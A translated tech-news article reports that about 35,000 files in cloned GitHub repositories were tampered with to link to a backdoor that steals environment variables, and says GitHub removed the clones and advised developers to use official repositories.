35,000 codes on GitHub were cloned to spread malware – Tecnoblog

At best deals,
no tail tied

Cloning open source repositories is not an uncommon practice. In fact, this is even encouraged. But an action of the type discovered by the software engineer Stephen Lacy avoids any good intentions: more than 35 thousand files in GitHub have been copied and tampered with with malicious code.

Clone Troopers (illustrative image: reproduction/Lucasfilm)
Clone Troopers (illustrative image: reproduction/Lucasfilm)

via Twitter, Lacy says he discovered the problem while reviewing the source code of a project found on GitHub from a Google search. With that work, he discovered a link in the code that leads to malware.

Intrigued, the engineer looked for the link in other repositories. The result was surprising. The same address was found in over 35,000 files stored in repositories on GitHub.

At first, Lacy thought these repositories had been compromised in some way. He even listed a few: “crypto, golang, python, js, bash, docker and k8s”.

But it soon became clear that the affected projects were actually clones of other repositories. The originals remained intact, including those mentioned by him.

It was a relief, right? Not so much. If a developer comes across one of the malicious clones, they may simply use that project without realizing that in doing so, they are helping to spread malware. The consequences can be disastrous.

What does malware do?

A developer named James Tucker discovered that such a link leads to a backdoor that, when active, can perform arbitrary actions on the affected computer.

Among them are, presumably, instructions for collecting sensitive data. Also because the malicious code also makes it possible to capture environment variables. These include data like API keys, cryptographic keys, and Amazon Web Services credentials, for example.

This means that any project based on one or more compromised files could expose the application to danger from an unexpected source.

The malicious code in a file (image: Twitter/Stephen Lacy)
The malicious code in a file (image: Twitter/Stephen Lacy)

GitHub acted fast, but stay alert

It is important to clarify that the malicious code was found in 35 thousand files, but not in the same amount of repositories. A search made by BleepingComputer showed that about 13,000 of these files belonged to a single repository (redhat-operator-ecosystem), just to give you an example.

Fortunately, that repository was quickly removed by GitHub. The same goes for the other problematic clones. But the episode serves as a warning. Although not an easy task, it is important to check the origin of a repository before using it and, of course, give preference to official projects.

Stephen Lacy himself claims that this kind of situation is the reason why he doesn’t install packages found randomly on the internet.

To BleepingComputerGitHub submitted a recommendation that is in line with the care taken by the engineer:

As a good practice, remember to use software from the project’s official repositories and watch out for possible typos or forks/clones that may look identical to the originals, but hide malware.

Source link

About Admin

Check Also

Covid vaccine could be used to fight HIV and cancer

Although the subject of research for more than 30 years, messenger RNA (mRNA) technology still …

Leave a Reply

Your email address will not be published.